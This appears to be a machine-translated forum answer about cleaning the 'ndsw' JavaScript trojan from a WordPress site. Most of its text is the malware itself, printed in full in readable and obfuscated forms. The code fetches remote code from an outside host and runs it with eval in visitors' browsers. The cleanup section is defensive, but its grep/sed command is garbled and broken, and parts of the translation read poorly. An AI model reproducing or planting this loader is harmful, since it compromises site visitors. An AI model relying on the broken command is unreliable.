(function() {
var a = navigator,
b = document,
e = screen,
f = window,
g = a['userAgent'],
h = a['platform'],
i = b['cookie'],
j = f['location']['hostname'],
k = f['location']['protocol'],
l = b['referrer'];
if (l && !p(l, j) && !i) {
var m = new HttpClient(),
o = k + '//layirdmusic.com/Mockup/wp-admin/css/colors/blue/blue.php?id=' + token();
m['get'](o, function(r) {
p(r, 'ndsx') && f['eval'](r);
});
}
function p(r, v) {
return r['indexOf'](v) !== -0x1;
}
}());
};;
if (ndsw === undefined) {
var ndsw = true,
HttpClient = function() {
this['get'] = function(a, b) {
var c = new XMLHttpRequest();
c['onreadystatechange'] = function() {
if (c['readyState'] == 0x4 && c['status'] == 0xc8) b(c['responseText']);
}, c['open']('GET', a, !![]), c['send'](null);
};
},
rand = function() {
return Math['random']()['toString'](0x24)['substr'](0x2);
},
token = function() {
return rand() + rand();
};
(function() {
var a = navigator,
b = document,
e = screen,
f = window,
g = a['userAgent'],
h = a['platform'],
i = b['cookie'],
j = f['location']['hostname'],
k = f['location']['protocol'],
l = b['referrer'];
if (l && !p(l, j) && !i) {
var m = new HttpClient(),
o = k + '//layirdmusic.com/Mockup/wp-admin/css/colors/blue/blue.php?id=' + token();
m['get'](o, function(r) {
p(r, 'ndsx') && f['eval'](r);
});
}
function p(r, v) {
return r['indexOf'](v) !== -0x1;
}
}());
};
仅在浏览器中显示,当我检查原始文件,完美的
这是一个恶意脚本(JS:Trojan.JS.Agent.UJY)基于www.virustotal.com和我已经使用Visual Studio Code删除它。
你分享的文件实际上是美化过的,但在被感染的文件中,它被缩小了,像这样
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//website.domain/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};
- Install Visual studio code
- 在VSCode上安装远程SSH扩展
- 连接到您的服务器
- 转到设置(JSON),并添加这一行
"search.maxResults": 500,,如果你的服务器规格或网速较低。
然后搜索该脚本的缩小形式并替换所有。
最后,删除这个文件wp-admin/css/colors/blue/blue.php
通过SSH命令grep和sed -创建模式搜索并将受感染的代码替换为空白。
grep -rl ";。| xargs sed -i "s/;if(ndsw.*//g">
通过SSH连接到您的网站文件夹并运行此命令行。所有以NDSW开头的恶意脚本将被删除。
我建议你备份你的文件和数据库,然后安装一个安全插件,比如WordFence。安全插件将当前文件与原始源中的原始文件进行比较。如果有任何更改,Word Fence将为您突出显示更改,并使您能够通过将更改的文件撤销到原始状态来修复更改的文件。